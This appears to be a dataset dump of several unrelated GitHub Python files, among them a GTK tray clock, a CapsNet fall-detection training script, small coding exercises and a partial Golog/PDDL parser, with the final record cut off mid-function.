Gtk.StyleContext.add_provider_for_screen(Gdk.Screen.get_default(), css, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)\n tray.add(eventbox)\n self.tray_label = tray_label = Gtk.Label(label=self.prefix+self.suffix)\n eventbox.add(tray_label)\n tray.show_all()\n\n menu = Gtk.Menu()\n item_show_date = Gtk.CheckMenuItem(label='Show Date')\n item_show_date.set_active(self.show_date)\n def toggle_date(item_show_date, self=self):\n self.show_date = item_show_date.get_active()\n self.gtk_update_ui()\n item_show_date.connect('toggled', toggle_date)\n menu.append(item_show_date)\n item_show_seconds = Gtk.CheckMenuItem(label='Show Seconds')\n item_show_seconds.set_active(self.show_seconds)\n self.toggle_seconds_event = threading.Event()\n def toggle_seconds(item_show_seconds, self=self):\n self.show_seconds = item_show_seconds.get_active()\n # Wake the update thread, which will update the UI, then sleep again\n self.toggle_seconds_event.set()\n item_show_seconds.connect('toggled', toggle_seconds)\n menu.append(item_show_seconds)\n item_quit = Gtk.MenuItem(label='Quit')\n def quit(menu_item):\n if sys.version_info < (3, 0):\n os.kill(os.getpid(), signal.SIGINT)\n else:\n Gtk.main_quit()\n item_quit.connect('activate', quit)\n menu.append(item_quit)\n menu.show_all()\n def button_pressed(eventbox, event, menu=menu):\n if event.type == Gdk.EventType.BUTTON_PRESS and event.button == 3:\n menu.popup(None, None, None, None, event.button, event.time)\n eventbox.connect('button-press-event', button_pressed)\n\n # Update the UI (thread-safe)\n def update_ui(self):\n GLib.idle_add(self.gtk_update_ui)\n\n # Update the UI (within the GTK main thread ; not thread-safe)\n def gtk_update_ui(self):\n fmt = self.prefix\n if self.show_date: fmt += self.date_format\n fmt += self.time_format\n if self.show_seconds: fmt += self.seconds_format\n fmt += self.suffix\n\n # Update events should fire as close as possible to the second or minute boundary, but if they\n # fire early, the previous time will incorrectly be displayed until the next update. Fudge the\n # time to make sure the display is incremented even if the event fires slightly early.\n now = datetime.datetime.now() + self.time_fudge\n\n self.tray_label.set_text(now.strftime(fmt))\n\n # Return false to unregister this method as a GLib idle handler\n return False\n\n def start_update_thread(self):\n def run_in_thread(self=self):\n while True:\n fired_update = datetime.datetime.utcnow()\n self.update_ui()\n now = datetime.datetime.utcnow()\n if self.show_seconds:\n time_to_next_update = 1 - now.microsecond/1000000.0\n if (1000000.0 - fired_update.microsecond) < self.time_fudge.microseconds:\n time_to_next_update += 1\n else:\n time_to_next_update = 60 - now.second - now.microsecond/1000000.0\n if time_to_next_update < 1 and (1000000.0 - fired_update.microsecond) < self.time_fudge.microseconds:\n time_to_next_update += 60\n self.toggle_seconds_event.wait(time_to_next_update) ; self.toggle_seconds_event.clear()\n thread = threading.Thread(target=run_in_thread)\n thread.daemon = True\n thread.start()\n\nif __name__ == '__main__':\n TimeApp()\n\n def on_sigint(_signum, _frame):\n Gtk.main_quit()\n signal.signal(signal.SIGINT, on_sigint)\n\n # If the main thread is running C code (such as Gtk.main()), then Python signal handlers will not\n # run until that C code returns. To work around this, run the C code in a separate thread, then\n # sleep the main thread. Unfortunately, threading.Thread().join() and threading.Event().wait() in\n # Python 2.X (but not 3.X) also block signal handlers (see http://bugs.python.org/issue1167930).\n # To work around this, sleep the main thread using signal.pause(), and wake it from the 'Quit'\n # menu item above using `os.kill(os.getpid(), signal.SIGINT)`.\n thread = threading.Thread(target=Gtk.main)\n thread.start()\n if sys.version_info < (3, 0):\n signal.pause()\n thread.join()\n","repo_name":"PaulSD/Tray_Apps","sub_path":"time_app.py","file_name":"time_app.py","file_ext":"py","file_size_in_byte":5627,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"7109284453","text":"from nis import match\nfrom re import S\nfrom unittest import case\nimport requests\nfrom datetime import datetime\n\n\n\nurl = \"http://localhost:8080/\"\n\nloop = True\n\nwhile(loop):\n dorsal = input(\"Insira a dorsal: \")\n \n evento = input(\"Insira o evento: \")\n\n start = input(\"Insira o tempo de partida: \")\n start_parse = datetime.strptime(start, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n p1 = input(\"Insira o tempo do primeiro ponto intermédio: \")\n p1_parse = datetime.strptime(p1, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n p2 = input(\"Insira o tempo do segundo ponto intermédio: \")\n p2_parse = datetime.strptime(p2, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n p3 = input(\"Insira o tempo do terceiro ponto intermédio: \")\n p3_parse = datetime.strptime(p3, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n finish = input(\"Insira o tempo de chegada: \")\n finish_parse = datetime.strptime(finish, '%Y-%m-%dT%H:%M:%S.%f%z')\n\n request = { \"dorsal\": dorsal, \"evento\": evento, \"start\": start_parse, \"p1\": p1_parse, \"p2\": p2_parse, \"p3\": p3_parse, \"finish\": finish_parse }\n response = requests.post(f\"{url}sensores\",json=request)\n\n \n \n \n\n print(\" \")\n aux = input(\"Deseja continuar? (y/n): \")\n if(aux == 'y'):\n continue\n elif(aux == 'n'):\n loop = False \n else:\n print(\"Invalid Option\")","repo_name":"goncaloacorreia/SD-Work2","sub_path":"AppCliente/sensores.py","file_name":"sensores.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7850581209","text":"import os\r\nimport shutil\r\n\r\nsourcePath=\"C:/Users/Admin/Desktop/p102\"\r\ndestPath=\"C:/Users/Admin/Desktop/d102/docs\"\r\n\r\nfileList=os.listdir(sourcePath)\r\nprint(fileList)\r\n\r\nfor file in fileList:\r\n name,ext=os.path.splitext(file)\r\n if ext=='':\r\n continue\r\n if ext in ['.txt','.docx']:\r\n path1=sourcePath+'/'+file\r\n path2=destPath+'/'+file\r\n shutil.move(path1,path2)\r\n print(path1)\r\n print(path2)","repo_name":"soham-fast/New-folder","sub_path":"p102.py","file_name":"p102.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26390343746","text":"import numpy as np\r\nfrom keras import layers, models, optimizers\r\nfrom keras import backend as K\r\nfrom keras.utils import to_categorical\r\nimport matplotlib.pyplot as plt\r\nfrom utils import combine_images\r\nfrom PIL import Image\r\nfrom capsulelayers import CapsuleLayer, PrimaryCap, Length, Mask\r\nimport scipy.io as sio\r\nfrom scipy import ndimage, misc\r\nimport os\r\nimport scipy\r\nfrom keras.utils import np_utils\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.cross_validation import cross_val_score, cross_val_predict\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import KFold \r\n#path = 'C:/Users/Hamidreza/Desktop/FALL DETECTION PROJECT/200 Hz/video/Images/imagecolor/'\r\npath = 'C:/Users/Hamidreza/Desktop/data/imcoloraug10/'\r\n\r\nSSS=3360\r\ndata = np.zeros((SSS,64,68,3))\r\nzz=[]\r\n\r\nfor i in range(SSS): \r\n zz.append(str(i)+\".jpg\")\r\n\r\nfor ii, imagee in enumerate(zz):\r\n path2 = os.path.join(path, imagee)\r\n image2 = ndimage.imread(path2)\r\n image2=image2.astype(np.float64)\r\n image2= scipy.misc.imresize(image2, 0.5)\r\n data[ii,:,:,:]=image2/255\r\n\r\nimport csv\r\nwith open('C:/Users/Hamidreza/Desktop/data/labfall.csv', 'r') as mf:\r\n#with open('C:/Users/Hamidreza/Desktop/FALL DETECTION PROJECT/200 Hz/video/Images/Final/lab.csv', 'r') as mf:\r\n re = csv.reader(mf,delimiter=',',quotechar='|')\r\n re=np.array(list(re))\r\n label = re.astype(np.float64)\r\n label=np.squeeze(label) \r\n \r\nlabel=np.repeat(label,10)\r\n \r\nK.set_image_data_format('channels_last')\r\n\r\ndef CapsNet(input_shape, n_class, routings):\r\n\r\n x = layers.Input(shape=input_shape)\r\n\r\n # Layer 1: Just a conventional Conv2D layer\r\n conv1 = layers.Conv2D(filters=8, kernel_size=3, strides=1, padding='valid', activation='relu', name='conv1')(x)\r\n #64\r\n # Layer 2: Conv2D layer with `squash` activation, then reshape to [None, num_capsule, dim_capsule]\r\n primarycaps = PrimaryCap(conv1, dim_capsule=8, n_channels=8, kernel_size=3, strides=2, padding='valid')\r\n\r\n # Layer 3: Capsule layer. Routing algorithm works here.\r\n digitcaps = CapsuleLayer(num_capsule=n_class, dim_capsule=8, routings=routings,\r\n name='digitcaps')(primarycaps)\r\n\r\n # Layer 4: This is an auxiliary layer to replace each capsule with its length. Just to match the true label's shape.\r\n # If using tensorflow, this will not be necessary. :)\r\n out_caps = Length(name='capsnet')(digitcaps)\r\n\r\n # Decoder network.\r\n y = layers.Input(shape=(n_class,))\r\n masked_by_y = Mask()([digitcaps, y]) # The true label is used to mask the output of capsule layer. For training\r\n masked = Mask()(digitcaps) # Mask using the capsule with maximal length. For prediction\r\n\r\n # Shared Decoder model in training and prediction\r\n decoder = models.Sequential(name='decoder')\r\n decoder.add(layers.Dense(64, activation='relu', input_dim=8*n_class))#512\r\n decoder.add(layers.Dense(128, activation='relu'))#1024\r\n decoder.add(layers.Dense(np.prod(input_shape), activation='sigmoid'))\r\n decoder.add(layers.Reshape(target_shape=input_shape, name='out_recon'))\r\n\r\n # Models for training and evaluation (prediction)\r\n train_model = models.Model([x, y], [out_caps, decoder(masked_by_y)])\r\n eval_model = models.Model(x, [out_caps, decoder(masked)])\r\n\r\n return train_model, eval_model\r\n\r\n\r\ndef margin_loss(y_true, y_pred):\r\n\r\n L = y_true * K.square(K.maximum(0., 0.9 - y_pred)) + \\\r\n 0.5 * (1 - y_true) * K.square(K.maximum(0., y_pred - 0.1))\r\n\r\n return K.mean(K.sum(L, 1))\r\n\r\n\r\ndef train(model,x_train,y_train,x_test, y_test, args):\r\n \r\n # callbacks\r\n log = callbacks.CSVLogger(args.save_dir + '/log.csv')\r\n tb = callbacks.TensorBoard(log_dir=args.save_dir + '/tensorboard-logs',\r\n batch_size=args.batch_size, histogram_freq=int(args.debug))\r\n checkpoint = callbacks.ModelCheckpoint(args.save_dir + '/weights-{epoch:02d}.h5', monitor='val_capsnet_acc',\r\n save_best_only=True, save_weights_only=True, verbose=1)\r\n lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: args.lr * (args.lr_decay ** epoch))\r\n\r\n # compile the model\r\n model.compile(optimizer=optimizers.Adam(lr=args.lr),\r\n loss=[margin_loss, 'binary_crossentropy'],\r\n loss_weights=[1., args.lam_recon],\r\n metrics={'capsnet': 'accuracy'})\r\n\r\n\r\n # Training without data augmentation:\r\n model.fit([x_train, y_train], [y_train, x_train], batch_size=args.batch_size, epochs=args.epochs,\r\n validation_data=[[x_test, y_test], [y_test, x_test]], callbacks=[log, tb, checkpoint, lr_decay])\r\n\r\n model.save_weights(args.save_dir + '/trained_model.h5')\r\n print('Trained model saved to \\'%s/trained_model.h5\\'' % args.save_dir)\r\n\r\n from utils import plot_log\r\n plot_log(args.save_dir + '/log.csv', show=True)\r\n\r\n return model\r\n\r\n\r\ndef test(model, x_test, y_test, args):\r\n y_pred= model.predict(x_test, batch_size=8)\r\n print('Test acc:', np.sum(np.argmax(y_pred, 1) == np.argmax(y_test, 1))/y_test.shape[0])\r\n \r\n\r\ndef load_data():\r\n# O=2880\r\n# x_train=data[:O,:,:,:]\r\n# x_test=data[O:,:,:,:]\r\n# y_train=label[:O]\r\n# y_test=label[O:]\r\n# m=4\r\n# \r\n# kf=KFold(5, random_state=None, shuffle=False)\r\n# kf.get_n_splits(data)\r\n# k=0\r\n# for train_index, test_index in kf.split(data):\r\n# x_train, x_test = data[train_index], data[test_index]\r\n# y_train, y_test = label[train_index], label[test_index]\r\n# \r\n# if k==m:\r\n# break \r\n# k=k+1\r\n x_train, x_test, y_train, y_test = train_test_split(data, label, test_size=0.95)\r\n y_test2=y_test\r\n print(x_train.shape, y_train.shape)\r\n print(x_test.shape, y_test.shape)\r\n x_train = x_train.reshape(-1, 64, 68, 3).astype('float32') \r\n x_test = x_test.reshape(-1, 64, 68, 3).astype('float32') \r\n# x_train = x_train.reshape(-1, 28, 28, 1).astype('float32') / 255.\r\n# x_test = x_test.reshape(-1, 28, 28, 1).astype('float32') / 255.\r\n y_train = to_categorical(y_train.astype('float32'))\r\n y_test = to_categorical(y_test.astype('float32'))\r\n return x_train, y_train, x_test, y_test, y_test2\r\n\r\n \r\nif __name__ == \"__main__\":\r\n import os\r\n import argparse\r\n from keras import callbacks\r\n\r\n # setting the hyper parameters\r\n parser = argparse.ArgumentParser(description=\"CapsFall\")\r\n parser.add_argument('--epochs', default=20, type=int)\r\n parser.add_argument('--batch_size', default=100, type=int)\r\n parser.add_argument('--lr', default=0.001, type=float,\r\n help=\"Initial learning rate\")\r\n parser.add_argument('--lr_decay', default=1, type=float,\r\n help=\"The value multiplied by lr at each epoch. Set a larger value for larger epochs\")\r\n parser.add_argument('--lam_recon', default=0.392, type=float,\r\n help=\"The coefficient for the loss of decoder\")\r\n parser.add_argument('-r', '--routings', default=3, type=int,\r\n help=\"Number of iterations used in routing algorithm. should > 0\")\r\n parser.add_argument('--shift_fraction', default=0.1, type=float,\r\n help=\"Fraction of pixels to shift at most in each direction.\")\r\n parser.add_argument('--debug', action='store_true',\r\n help=\"Save weights by TensorBoard\")\r\n parser.add_argument('--save_dir', default='./result')\r\n parser.add_argument('-t', '--testing', action='store_true',\r\n help=\"Test the trained model on testing dataset\")\r\n parser.add_argument('-w', '--weights', default=None,\r\n help=\"The path of the saved weights. Should be specified when testing\")\r\n args = parser.parse_args()\r\n print(args)\r\n\r\n if not os.path.exists(args.save_dir):\r\n os.makedirs(args.save_dir)\r\n\r\n # load data\r\n x_train, y_train, x_test, y_test, y_test2 = load_data()\r\n\r\n input_shape= x_train.shape[1:4] \r\n\r\n # define model\r\n model, eval_model = CapsNet(input_shape=x_train.shape[1:],\r\n n_class=len(np.unique(np.argmax(y_train, 1))),\r\n routings=args.routings)\r\n model.summary()\r\n\r\n # train or test\r\n if args.weights is not None: # init the model weights with provided one\r\n model.load_weights(args.weights)\r\n if not args.testing:\r\n train(model=model, x_train=x_train, y_train=y_train, x_test=x_test, y_test=y_test, args=args)\r\n else: # as long as weights are given, will run testing\r\n if args.weights is None:\r\n print('No weights are provided. Will test using random initialized weights.')\r\n test(model=eval_model, x_test=x_test, y_test=y_test, args=args)\r\n model=eval_model\r\n y_pred= model.predict(x_test, batch_size=40)\r\n y_pred=y_pred[0]\r\n \r\n print('Test acc:', np.sum(np.argmax(y_pred, 1) == np.argmax(y_test, 1))/y_test.shape[0])\r\n y_pred = np.argmax(y_pred, axis=1)\r\n y_pred =y_pred.astype(np.float64)\r\n labels = {1:'Non-Fall', 2:'Fall'}\r\n print(classification_report(y_pred, y_test2,\r\n target_names=[l for l in labels.values()]))\r\n r22= metrics.r2_score(y_test2, y_pred)\r\n print('R2:', r22)","repo_name":"data-man-34/CapsFall","sub_path":"capsfall.py","file_name":"capsfall.py","file_ext":"py","file_size_in_byte":9492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17571052226","text":"class Solution:\n \"\"\"\n @param: nums: an integer array\n @return:\n \"\"\"\n def moveZeroes_1(self, nums):\n # two pointers:\n # assign the non-zero number in the nums, starting from the beginning of nums\n # assign 0 to from start to end of nums\n index = 0 # the index from 0\n start = 0 # pointer, which is pointed to non-zero\n\n while index < len(nums) and start < len(nums):\n # find the nums is not equal to 0\n while start < len(nums) and nums[start] == 0:\n start += 1\n\n if start < len(nums):\n nums[index] = nums[start]\n index += 1\n start += 1\n\n while index < len(nums):\n nums[index] = 0\n index += 1\n\n\n def moveZeroes_2(self, nums):\n #\n index = 0\n right = 0\n\n while right < len(nums):\n if nums[right] != 0:\n nums[right], nums[index] = nums[index], nums[right]\n index += 1\n\n right += 1\n\n#\n# def main():\n# s = Solution()\n# nums = [0, 0, 0]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n# nums = [1, 2, 3]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n# nums = [1, 0, 2, 0, 3]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n# nums = [1, 2, 3, 0, 0]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n# nums = [0, 0, 1, 2, 3]\n# s.moveZeroes_1(nums)\n# print(nums)\n#\n#\n# if __name__ == '__main__':\n# main()\n","repo_name":"HS4MORVEL/Lintcode-solution-in-Python","sub_path":"539_move_zeroes.py","file_name":"539_move_zeroes.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"9233895055","text":"companies={}\nwhile True:\n command = input()\n if command == \"End\":\n break\n company, employee = command.split(\" -> \")\n if company not in companies:\n companies[company]=[]\n if employee not in companies[company]:\n companies[company].append(employee)\n\nsorted_companies=dict(sorted(companies.items(), key=lambda x: x[0]))\n\nfor company,employee in sorted_companies.items():\n print(company)\n for employee in sorted_companies[company]:\n print(f\"-- {employee}\")\n","repo_name":"Pandam0n1um/SoftUni-Software-Engineering","sub_path":"Programming Fundamentals with Python - September 2021/09_Dictionaries/exer_10_company_users.py","file_name":"exer_10_company_users.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11491394169","text":"from typing import *\nimport sys\n\n\nclass Node:\n val = 0\n next = None\n\n def __init__(self, val):\n self.val = val\n\n\nclass LL:\n head = None\n\n def __init__(self):\n self.head = None\n\n def insert_node(self, position, value):\n\n header = self.head\n\n if position < 1:\n return\n\n if position == 1:\n self.head = Node(value)\n self.head.next = header\n return self.head\n iter_head = self.head\n while iter_head is not None and iter_head.next is not None and position > 2:\n iter_head = iter_head.next\n position -= 1\n\n if position != 2:\n return\n\n if iter_head is None:\n return\n\n tmp = iter_head.next\n iter_head.next = Node(value)\n iter_head.next.next = tmp\n\n return\n\n def delete_node(self, position):\n\n if position < 1:\n return\n\n if position == 1:\n if self.head is None:\n return None\n header = self.head.next\n self.head = header\n return\n iter_head = self.head\n while iter_head is not None and position > 2:\n iter_head = iter_head.next\n position -= 1\n\n if iter_head is None or iter_head.next is None:\n return\n\n iter_head.next = iter_head.next.next\n return\n # @param position, integer\n # @return an integer\n\n def print_ll(self):\n header = self.head\n while self.head is not None:\n if self.head.next is None:\n print(self.head.val, end=\"\")\n else:\n print(self.head.val, end=\" \")\n self.head = self.head.next\n self.head = header\n return\n # Output each element followed by a space\n\n\nlinkedlist = LL()\n\n\ndef insert_node(position, value):\n linkedlist.insert_node(position, value)\n\n\ndef print_ll():\n linkedlist.print_ll()\n print()\n\n\ndef delete_node(position):\n linkedlist.delete_node(position)\n\n#\n# print(\"Hi\")\n# t = int(input())\n#\n# while t > 0:\n# arr = sys.stdin.readline().strip().split()\n# if arr[0] == 'i':\n# insert_node(int(arr[1]), int(arr[2]))\n# if arr[0] == 'p':\n# print_ll()\n# if arr[0] == 'd':\n# delete_node(int(arr[1]))\n# t -= 1\n","repo_name":"akashdeep3194/Scaler","sub_path":"d32/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5634274070","text":"import json\nimport pandas as pd\nimport os\n\npath = os.path.dirname(os.path.abspath(__file__))\n\n\ndef main():\n payload = {}\n df = pd.read_csv(f\"{path}/files/clean/dataset_clima.csv\")\n df.tiempo = df.tiempo.astype(\"datetime64\")\n days = [\"Lun\", \"Mar\", \"Mie\", \"Jue\", \"Vie\", \"Sab\", \"Dom\"]\n for j in range(1, 13):\n data = []\n for i in range(2017, 2021):\n traces = {}\n traces[\"type\"] = \"scatter\"\n\n mydf = df.loc[(df[\"tiempo\"].dt.year == i) & (df[\"tiempo\"].dt.month == j)]\n mydf = mydf.groupby(mydf[\"tiempo\"].dt.weekday).mean().reset_index()\n traces[\"x\"] = days\n traces[\"y\"] = list(mydf[\"energia_activa\"].values)\n traces[\"name\"] = i\n traces[\"mode\"] = \"lines\"\n traces[\"line\"] = {\"shape\": \"spline\"}\n data.append(traces)\n payload[j] = data\n print(json.dumps({\"status\": \"ok\", \"msg\": payload}))\n\n\nmain()\n","repo_name":"jcdaniel14/react-visual","sub_path":"api/scripts/ml/get_facets.py","file_name":"get_facets.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24456502751","text":"\"\"\"Write a Python program to count the number of characters (character\nfrequency) in a string. Sample String : google.com\nExpected Result : {'o': 3, 'g': 2, '.': 1, 'e': 1, 'l': 1, 'm': 1, 'c': 1}\n\"\"\"\ndef find_string_count(word):\n dict={}\n for each in set(word):\n dict[each]=word.count(each)\n return dict\n\nif __name__ == '__main__':\n inputWord=input('Enter any Word')\n result=find_string_count(inputWord)\n print(result)\n","repo_name":"PreritBhandari/python-programs","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"7772264638","text":"\naction_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression = {} \n# init dict : 'hig_name(=xxx)' -> {'arg_1':'BlockType';'arg_6':'BlockType';......}\ndef add_global_args_declear_andlist_dict(key,value): # called by Nested_list2FOLExp().run_s Nested_list2FOLExpressionwithSituation function:\n global action_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression\n action_args_declear_andlist_dict_define_in_GologTree_Nests_assgined_in_main_regression[key] = value # ,\n \nimport copy\nclass ActionMapGolog :\n def __init__(self,actionMaplist:list()) -> None:\n self.act_map_golog_dict = dict()\n GologTreeObj = GologExprTree()\n cplist = copy.deepcopy(actionMaplist)\n thegologprogramnodeTree = GologTreeObj.recursive_build_golog_tree(cplist[1]) # build the golog tree for mapping low golog program\n GologTreeObj.loop_set_s_i_s_o(thegologprogramnodeTree) # set the golog tree nodes's: 's_i' & 's_o'\n self.act_map_golog_dict[cplist[0][0]] = thegologprogramnodeTree\n\n def __str__(self) -> str:\n return str(self.act_map_golog_dict)\n \n\nclass Nested_list2FOLExp:\n def __init__(self):\n self.FOL_Exp = \"\"\n self.const_declare_in_andlist = {}# andlistrefinementMaparg_3 \n\n def insertConsForSort(self,OneOfUntyped_variableslist,curtype):\n \"\"\"add to self.ConsForSort if not added before\"\"\"\n if OneOfUntyped_variableslist not in self.const_declare_in_andlist:\n self.const_declare_in_andlist[OneOfUntyped_variableslist] = curtype\n else:\n if self.const_declare_in_andlist[OneOfUntyped_variableslist] == curtype:\n pass # already added before,just pass\n else:\n raise Exception(OneOfUntyped_variableslist +' is already defined as ' \\\n + self.const_declare_in_andlist[OneOfUntyped_variableslist] \\\n + '.For theorem prove,it can not defined again with another sort:' + curtype)\n # @staticmethod\n def run(self, group):\n self.Nested_list2FOLExpression(group)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # clear(A),\n return self.FOL_Exp\n\n def Nested_list2FOLExpression(self, group):\n \"\"\"self.Nested_list2FOLExpression\"\"\"\n while group:\n cur = group.pop(0)\n if type(cur) == type(list()):\n self.Nested_list2FOLExpression(cur) # nested list\n elif type(cur) == type(str()):\n if cur == 'and' or cur == 'And':\n if len(group) == 1:\n self.Nested_list2FOLExpression(group)\n else: # >1,\"and(1,2,...)\"\"\n self.FOL_Exp += 'And('\n self.Nested_list2FOLExpression(group)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ')'\n elif cur == 'Not' or cur == 'not':\n if len(group) == 1:# ['Not',above[...]]\n self.FOL_Exp += 'Not('\n self.Nested_list2FOLExpression(group)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'# And(Not(B==arg_3)Not(A==arg_4))\n else:\n raise Exception(\"\\'Not\\' only accept one args.\")\n elif cur == 'or' or cur == 'Or':\n if len(group) == 1:\n self.Nested_list2FOLExpression(group)\n else: # >1,\"or(1,2,...)\"\"\n self.FOL_Exp += 'Or('\n self.Nested_list2FOLExpression(group)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'\n elif cur == 'exists' or cur == 'Exists':\n cp_arg_declare_list = copy.deepcopy(group[0])\n while cp_arg_declare_list !=[]:\n cur_char_variables = cp_arg_declare_list.pop(0)# pop\n if cur_char_variables[0] == '?' and '-' in cp_arg_declare_list:\n index_of_sort_declare = 1 + cp_arg_declare_list.index('-')\t# () ,+1\n self.insertConsForSort(cur_char_variables,cp_arg_declare_list[index_of_sort_declare])\n # andlist self.const_declare_in_andlist \n #\n self.FOL_Exp += 'Exists(['\n for each in group[0]:\n if each[0] == '?':\n self.FOL_Exp += each[1:]\n self.FOL_Exp += ','\n self.FOL_Exp = self.FOL_Exp[:-1] # \"[x,y,\"\" ==> \"[x,y\" \n self.FOL_Exp += '],' # [x,y],\n self.FOL_Exp += '(' # [x,y],(\n group.pop(0)\n self.Nested_list2FOLExpression(group[0])\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ')'# '[x,y],(' ')'\n self.FOL_Exp += '),'# 'Exists([' ')'And()'('','\n elif cur == 'forall' or cur == 'ForAll' or cur == 'Forall':\n self.FOL_Exp += 'ForAll(['\n for each in group[0]:\n if each[0] == '?':\n self.FOL_Exp += each[1:]\n self.FOL_Exp += ','\n #\n cp_arg_declare_list = copy.deepcopy(group[0])\n while cp_arg_declare_list !=[]:\n cur_char_variables = cp_arg_declare_list.pop(0)# pop\n if cur_char_variables[0] == '?' and '-' in cp_arg_declare_list:\n index_of_sort_declare = 1 + cp_arg_declare_list.index('-')\t# () ,+1\n self.insertConsForSort(cur_char_variables,cp_arg_declare_list[index_of_sort_declare])\n # andlist self.const_declare_in_andlist \n self.FOL_Exp = self.FOL_Exp[:-1]\n self.FOL_Exp += '],'\n self.FOL_Exp += '('# 'ForAll([x,y],(' \n group.pop(0) # ['?x','-','BlockType']\n self.Nested_list2FOLExpression(group[0])\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ',' \n self.FOL_Exp += ')'# 'ForAll([x,y],(' ')'\n self.FOL_Exp += '),'# 'Exists([' ')'And()\n elif cur == '==':\n if (type(group[0]) == type(group[1])) and (type(group[0]) == type(str())):\n self.FOL_Exp += (group[0].strip('?') + '==' + group[1].strip('?') + ',')\n group.pop(0)\n else:\n raise Exception('Error usage of \\' == \\'.')\n break\n elif cur == '!=':\n if (type(group[0]) == type(group[1])) and (type(group[0]) == type(str())):\n self.FOL_Exp += '('+ (group[0].strip('?') + '!=' + group[1].strip('?') + ','+s_i+'),')\n group.pop(0)\n else:\n raise Exception('Error usage of \\' != \\'.')\n break\n else: # Predicates defined by users like \"clear A\"\n \n self.FOL_Exp += cur + '('\n if len(group) != 0:\n for each in group:\n self.FOL_Exp += each.strip('?') + ','\n group.clear() # above ['x','A'] --> []\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'\n else: # zero arg predicate like\"arm-empty\"\"\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ','\n break\n else:\n raise Exception('Error Input format!')\n\n\n def run_s(self, group,s_i,s_o):\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # 'clear(A,s_i),'-->'clear(A,s_i)'\n return self.FOL_Exp,self.const_declare_in_andlist# ?arg_6GologTest\n\n def Nested_list2FOLExpressionwithSituation(self, group,s_i,s_o):\n \"\"\"self.Nested_list2FOLExpressionwithSituation's_o','s_i'\"\"\"\n while group:\n cur = group.pop(0)\n if type(cur) == type(list()):\n self.Nested_list2FOLExpressionwithSituation(cur,s_i,s_o) # nested list\n elif type(cur) == type(str()):\n if cur == 'and' or cur == 'And':\n if len(group) == 1:\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n else: # >1,\"and(1,2,...)\"\"\n self.FOL_Exp += 'And('\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += ')'\n elif cur == 'Not' or cur == 'not':\n if len(group) == 1:# ['Not',above[...]]\n self.FOL_Exp += 'Not('\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'\n else:\n raise Exception(\"\\'Not\\' only accept one args.\")\n elif cur == 'or' or cur == 'Or':\n if len(group) == 1:\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n else: # >1,\"or(1,2,...)\"\"\n self.FOL_Exp += 'Or('\n self.Nested_list2FOLExpressionwithSituation(group,s_i,s_o)\n if self.FOL_Exp[-1] == ',':\n self.FOL_Exp = self.FOL_Exp[:-1] # del last ','\n self.FOL_Exp += '),'\n elif cur == 'exists' or cur == 'Exists':\n exist_args_list = []\n exist_args_dict = {} # GologTest\n cp_group_var_sort = copy.deepcopy(group[0])\n while(cp_group_var_sort):\n cur = cp_group_var_sort.pop(0)\n # if cur == '?arg_6':\n # print()\n if cur[0] == '?':\n exist_args_list.append(cur)\n if cur == 